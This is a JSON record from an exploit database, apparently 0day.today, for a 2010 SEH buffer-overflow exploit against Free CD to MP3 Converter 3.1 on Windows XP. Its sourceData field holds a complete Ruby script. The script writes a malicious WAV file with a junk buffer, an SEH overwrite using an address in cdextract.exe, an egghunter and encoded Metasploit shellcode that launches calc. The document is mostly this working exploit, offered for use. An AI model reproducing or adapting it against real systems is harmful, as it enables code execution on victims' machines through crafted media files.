Description
Exploit for windows platform in category local exploits
{"id": "1337DAY-ID-14788", "type": "zdt", "bulletinFamily": "exploit", "title": "Free CD to MP3 Converter v3.1 Buffer Overflow Exploit (SEH)", "description": "Exploit for windows platform in category local exploits", "published": "2010-11-11T00:00:00", "modified": "2010-11-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/14788", "reporter": "C4SS!0 G0M3S", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-10T01:09:27", "viewCount": 11, "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "sourceHref": "https://0day.today/exploit/14788", "sourceData": "===========================================================\r\nFree CD to MP3 Converter v3.1 Buffer Overflow Exploit (SEH)\r\n===========================================================\r\n\r\n# Exploit Title: Free CD to MP3 Converter 3.1 Buffer Overflow Exploit (SEH)\r\n# Date: 10/18/10\r\n# Credit/Bug found by: C4SS!0 G0M3S\r\n# Software Link: http://www.eusing.com/Download/cdtomp3freeware.exe\r\n# Version: 3.1\r\n# Tested on: Windows XP SP3 EN (VMWARE FUSION - Version 3.1.1)\r\n# CVE: N/A\r\n \r\n#! /usr/bin/env ruby\r\nfilename = 'crash.wav'\r\n \r\n# windows/exec - 144 bytes\r\n# http://www.metasploit.com\r\n# Encoder: x86/shikata_ga_nai\r\n# EXITFUNC=seh, CMD=calc\r\nshellcode = ''\r\nshellcode << \"\\xdb\\xc0\\x31\\xc9\\xbf\\x7c\\x16\\x70\\xcc\"\r\nshellcode << \"\\xd9\\x74\\x24\\xf4\\xb1\\x1e\\x58\\x31\\x78\"\r\nshellcode << \"\\x18\\x83\\xe8\\xfc\\x03\\x78\\x68\\xf4\\x85\"\r\nshellcode << \"\\x30\\x78\\xbc\\x65\\xc9\\x78\\xb6\\x23\\xf5\"\r\nshellcode << \"\\xf3\\xb4\\xae\\x7d\\x02\\xaa\\x3a\\x32\\x1c\"\r\nshellcode << \"\\xbf\\x62\\xed\\x1d\\x54\\xd5\\x66\\x29\\x21\"\r\nshellcode << \"\\xe7\\x96\\x60\\xf5\\x71\\xca\\x06\\x35\\xf5\"\r\nshellcode << \"\\x14\\xc7\\x7c\\xfb\\x1b\\x05\\x6b\\xf0\\x27\"\r\nshellcode << \"\\xdd\\x48\\xfd\\x22\\x38\\x1b\\xa2\\xe8\\xc3\"\r\nshellcode << \"\\xf7\\x3b\\x7a\\xcf\\x4c\\x4f\\x23\\xd3\\x53\"\r\nshellcode << \"\\xa4\\x57\\xf7\\xd8\\x3b\\x83\\x8e\\x83\\x1f\"\r\nshellcode << \"\\x57\\x53\\x64\\x51\\xa1\\x33\\xcd\\xf5\\xc6\"\r\nshellcode << \"\\xf5\\xc1\\x7e\\x98\\xf5\\xaa\\xf1\\x05\\xa8\"\r\nshellcode << \"\\x26\\x99\\x3d\\x3b\\xc0\\xd9\\xfe\\x51\\x61\"\r\nshellcode << \"\\xb6\\x0e\\x2f\\x85\\x19\\x87\\xb7\\x78\\x2f\"\r\nshellcode << \"\\x59\\x90\\x7b\\xd7\\x05\\x7f\\xe8\\x7b\\xca\"\r\n \r\negghunter = ''\r\negghunter << \"\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8\"\r\negghunter << \"\\x77\\x30\\x30\\x74\"\r\negghunter << \"\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7\"\r\n \r\njunk1 = 'A' * 4156\r\nnseh = [0x06eb9090].pack('V') # jmp short 6 byte\r\nseh = [0x00409F8C].pack('V') # cdextract.exe\r\nnops = \"\\x90\" * 50\r\njunk2 = 'B' * (10000 - (junk1 + nseh + seh + nops + egghunter + nops + \"w00tw00t\" + shellcode).length)\r\n \r\n# [junk1 'A'][nseh - short jmp)][seh -pop pop ret][nops][egghunter][nops]['w00tw00t'][shellcode][junk2 'B']\r\n# (2)| ^___________________|(1) ^(3)--> (4) (5)Tag found!--> (6) \r\n# |_________________________________|\r\n \r\nxploit = junk1 + nseh + seh + nops + egghunter + nops + \"w00tw00t\" + shellcode + junk2\r\n \r\nFile.open(filename,'w') do |fd|\r\n fd.write xploit\r\n puts \"xploit file size : #{xploit.length.to_s}\"\r\nend\r\n\r\n\n\n# 0day.today [2018-01-09] #", "_state": {"dependencies": 1645252018, "score": 1659766679, "epss": 1678812679}}
{}
Free CD to MP3 Converter v3.1 Buffer Overflow Exploit (SEH)